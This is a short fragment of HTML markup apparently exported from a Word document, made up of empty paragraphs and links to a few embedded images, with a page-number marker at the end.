<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_2" o:spid="_x0000_i1025" type="#_x0000_t75" style="width:308.25pt;height:166.5pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image015.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><img border="0" width="411" height="222" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" v:shapes="图片_x0020_2" /><!----><a name="_GoBack"></a></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image016.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
</div>
页:
[1]